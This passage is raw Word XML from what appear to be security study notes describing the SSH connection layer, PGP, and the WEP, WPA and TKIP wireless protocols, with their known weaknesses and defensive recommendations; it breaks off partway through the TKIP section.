        <w:t xml:space="preserve">Connection layer - defines the concept of channels, channel requests and global requests using which SSH services are provided. A single SSH connection can host multiple channels simultaneously, each transferring data in both directions. Channel requests are used to relay out-of-band channel specific data, such as the changed size of a terminal window or the exit code of a server-side process. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B536F7" w:rsidRPr="00BF49BC" w:rsidRDefault="00BF49BC" w:rsidP="00B536F7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF49BC">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Since SSH-1 has inherent design flaws which make it vulnerable (e.g., man-in-the-middle attacks), it is now generally considered obsolete and should be avoided by explicitly disabling fallback to SSH-1. In all versions of SSH, it is important to verify unknown public keys before accepting them as valid. Accepting an attacker's public key as a valid public key has the effect of disclosing the transmitted password and allowing man-in-the-middle attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B536F7" w:rsidRPr="00B536F7" w:rsidRDefault="00B536F7" w:rsidP="00B536F7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRDefault="00576AAB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRPr="00CC2DFA" w:rsidRDefault="00576AAB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PGP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRDefault="00576AAB" w:rsidP="00CC2DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Pretty Good Privacy (PGP) is a computer program that provides cryptographic privacy and authentication. PGP is often used for signing, encrypting and decrypting e-mails to increase the security of e-mail communications. </w:t>
      </w:r>
      <w:r w:rsidR="002F1C92" w:rsidRPr="002F1C92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>In addition to protecting data in transit over a network, PGP encryption can also be used to protect data in long-term data storage such as disk files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21F92" w:rsidRPr="002F1C92" w:rsidRDefault="00E21F92" w:rsidP="002F1C92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1C92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">PGP encryption uses a serial combination of hashing, data compression, symmetric-key cryptography, and, finally, public-key cryptography; each step uses one of several supported algorithms. Each public key is bound to a user name and/or an e-mail address. The first version of this system was generally known as a web of trust to contrast with the X.509 system which uses a hierarchical approach based on certificate </w:t>
      </w:r>
      <w:r w:rsidRPr="002F1C92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>authority and which was added to PGP implementations later. Current versions of PGP encryption include both options through an automated key management server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21F92" w:rsidRPr="002F1C92" w:rsidRDefault="00E21F92" w:rsidP="002F1C92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1C92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PGP supports message authentication (digital signature to verify sender) and integrity checking to detect whether a message has been altered. The sender uses PGP to create a digital signature (hash of message generated with private key) for the message with either the RSA or DSA signature algorithms.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21F92" w:rsidRPr="002F1C92" w:rsidRDefault="00E21F92" w:rsidP="002F1C92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F1C92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">To the best of publicly available information, there is no known method which will allow a person or group to break PGP encryption by cryptographic or computational means. </w:t>
      </w:r>
      <w:r w:rsidR="002F1C92" w:rsidRPr="002F1C92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>However, e</w:t>
      </w:r>
      <w:r w:rsidRPr="002F1C92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">arly versions of PGP have been found to have theoretical vulnerabilities and so current versions are recommended. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E21F92" w:rsidRPr="00E21F92" w:rsidRDefault="00E21F92" w:rsidP="00E21F92">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BF49BC" w:rsidRPr="00BF49BC" w:rsidRDefault="00BF49BC" w:rsidP="00BF49BC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CE7A90" w:rsidRDefault="008876A5" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B12b - </w:t>
      </w:r>
      <w:r w:rsidRPr="008876A5">
        <w:t>Common wireless (802.11) encryption protocols: WEP, WPA, TKIP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008876A5" w:rsidRDefault="008876A5" w:rsidP="008876A5"/>
    <w:p w:rsidR="008876A5" w:rsidRPr="00CC2DFA" w:rsidRDefault="00576AAB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WEP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRDefault="00CC2DFA" w:rsidP="00CC2DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Wired Equivalent Privacy (WEP) is a deprecated algorithm to secure IEEE 802.11 wireless networks. Wireless networks broadcast messages using radio and are thus more susceptible to eavesdropping than wired networks. When introduced WEP was intended to provide confidentiality comparable to that of a traditional wired network. </w:t>
      </w:r>
      <w:r w:rsidR="004133F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">However, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>several serious weaknesses were identified by cryptanalysts with the result that today a WEP connection can be cracked with readily available software within minutes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC2DFA" w:rsidRDefault="004133F6" w:rsidP="00CC2DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004133F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WEP uses the stream cipher RC4 for confidentiality, and the CRC-32 checksum for integrity. Standard 64-bit WEP uses a 40 bit key, which is concatenated with a 24-bit initialization</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004133F6">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">vector (IV) to form the RC4 traffic key. A 128-bit WEP key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">has the same 24-bit IV and 104bits for encryption. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C739C" w:rsidRPr="008C739C" w:rsidRDefault="008C739C" w:rsidP="008C739C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Two methods of authentication can be used with WEP: Open System authentication and Shared Key authentication.</w:t>
      </w:r>
      <w:r w:rsidRPr="008C739C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Open System authentication is preferable as </w:t>
      </w:r>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">t is possible to derive the keystream used for the handshake by capturing the challenge frames in Shared Key authentication. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C739C" w:rsidRPr="008C739C" w:rsidRDefault="008C739C" w:rsidP="008C739C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Open System authentication - the WLAN client need not provide its credentials to the Access Point during authentication. After the authentication and association, WEP can be used for encrypting the data frames. At this point, the client needs to have the right keys.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C739C" w:rsidRPr="008C739C" w:rsidRDefault="008C739C" w:rsidP="008C739C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Shared Key authentication- the WEP key is used for authentication. A four-way challenge-response handshake is used:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C739C" w:rsidRPr="008C739C" w:rsidRDefault="008C739C" w:rsidP="008C739C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The client station sends an authentication request to the Access Point. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C739C" w:rsidRPr="008C739C" w:rsidRDefault="008C739C" w:rsidP="008C739C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Access Point sends back a clear-text challenge. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C739C" w:rsidRPr="008C739C" w:rsidRDefault="008C739C" w:rsidP="008C739C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The client has to encrypt the challenge text using the configured WEP key, and send it back in another authentication request. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C739C" w:rsidRPr="008C739C" w:rsidRDefault="008C739C" w:rsidP="008C739C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The Access Point decrypts the material, and compares it with the clear-text it had sent. Depending on the success of this comparison, the Access Point sends back a positive or negative response. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C739C" w:rsidRPr="008C739C" w:rsidRDefault="008C739C" w:rsidP="008C739C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>After the authentication and association, the pre-shared WEP key is also used for encrypting the data frames using RC4.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004133F6" w:rsidRPr="008C739C" w:rsidRDefault="008C739C" w:rsidP="008434F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008C739C">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Because RC4 is a stream cipher, the same traffic key must never be used twice. The purpose of an IV, which is transmitted as plain text, is to prevent any repetition, but a 24-bit IV is not long enough to ensure this on a busy network. The way the IV was used also opened WEP to a related key attack. For a 24-bit IV, there is a 50% probability the same IV will repeat after 5000 packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004133F6" w:rsidRDefault="004133F6" w:rsidP="004133F6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004133F6" w:rsidRPr="004133F6" w:rsidRDefault="004133F6" w:rsidP="004133F6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRPr="00CC2DFA" w:rsidRDefault="00576AAB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WPA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC2DFA" w:rsidRDefault="00CC2DFA" w:rsidP="00CC2DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Wi-Fi Pr</w:t>
      </w:r>
      <w:r w:rsidR="000C5571">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>otected Access (WPA and WPA2) are</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C5571">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">wireless communication protection system produced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>response to several serious weaknesses researchers had found in the previous system, WEP (Wired Equivalent Privacy).</w:t>
      </w:r>
      <w:r w:rsidR="000C5571">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C5571" w:rsidRDefault="000C5571" w:rsidP="00CC2DFA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C5571">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Pre-shared key mode (PSK, also known as Personal mode) is designed for home and small office networks that don't require the complexity of an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 802.1X authentication server</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5571">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>. Each wireless network device encrypts the network traffic using a 256 bit key. This key may be entered either as a string of 64 hexadecimal digits, or as a passphrase of 8 to 63 printable ASCII characters</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5571">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C5571">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Shared-key WPA remains vulnerable to password cracking attacks if users rely on a weak passphrase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="000C5571">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C5571">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>To further protect against intrusion the network's SSID should not match any entry in the top 1000 SSIDs.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRDefault="000C5571" w:rsidP="008876A5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">A WPA weakness exists which relied on a previously known flaw in WEP that could be exploited only for the TKIP algorithm in WPA. The flaw does not lead to key recovery, but only a keystream that encrypted a particular packet, and which can be reused as many as seven times to inject arbitrary data of the same packet length to a wireless client. For example, this allows someone to inject </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>faked ARP packets which makes</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the victim send packets to the open Internet. This attack was further optimised enabling attackers to inject larger malicious packets (596 bytes, to be more specific) within approximately 18 minutes and 25 seconds. This </w:t>
      </w:r>
      <w:r w:rsidR="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">does </w:t>
      </w:r>
      <w:r w:rsidRPr="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">not affect WPA2 systems that </w:t>
      </w:r>
      <w:r w:rsidR="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>use the stronger CCMP algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A1A44" w:rsidRDefault="006A1A44" w:rsidP="006A1A44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WPA- and WPA2- Enterprise integrate the use of EAP to perform 802.1x authentication via a remote authentication server and 802.1x enabled clients. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A1A44" w:rsidRDefault="006A1A44" w:rsidP="006A1A44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A1A44" w:rsidRDefault="006A1A44" w:rsidP="006A1A44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A1A44" w:rsidRDefault="006A1A44" w:rsidP="006A1A44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006A1A44" w:rsidRPr="006A1A44" w:rsidRDefault="006A1A44" w:rsidP="006A1A44">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00576AAB" w:rsidRPr="00CC2DFA" w:rsidRDefault="00576AAB" w:rsidP="008876A5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TKIP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A1A44" w:rsidRPr="006A1A44" w:rsidRDefault="00CC2DFA" w:rsidP="006A1A44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Temporal</w:t>
      </w:r>
      <w:r w:rsidR="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Key Integrity Protocol or TKIP</w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a security protocol used in the IEEE 802.11 wireless networking</w:t>
      </w:r>
      <w:r w:rsidR="006A1A44">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> standard. TKIP was designed </w:t>
      </w:r>
      <w:r w:rsidRPr="00CC2DFA">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>to replace WEP without requiring the replacement of legacy hardware. This was necessary because the breaking of WEP had left WiFi networks without viable link-layer security, and a solution was required for already deployed hardware.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A1A44" w:rsidRPr="003071E1" w:rsidRDefault="006A1A44" w:rsidP="003071E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TKIP and the related WPA standard, implement three new security features to address security problems encountered in WEP protected networks. First, TKIP implements a key mixing function that combines the secret root key with the initialization vector before passing it to the RC4 initialization. Second, WPA implements a sequence counter to protect against replay attacks by rejecting packets received out of order at the access point. Finally, TKIP implements a 64-bit message integrity check named MICHAEL. TKIP ensures that every data packet is sent with a unique encryption key.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A1A44" w:rsidRPr="003071E1" w:rsidRDefault="006A1A44" w:rsidP="003071E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003071E1">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TKIP uses the same underlying mechanism as WEP, and consequently is vulnerable to a number of similar attacks. The message integrity check, per-packet key hashing, broadcast key rotation, and a sequence counter discourage many attacks. The key mixing function also eliminates the WEP key recovery attacks. Notwithstanding these changes, the weakness of some of these additions have allowed for new, although narrower, attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006A1A44" w:rsidRPr="003071E1" w:rsidRDefault="006A1A44" w:rsidP="003071E1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
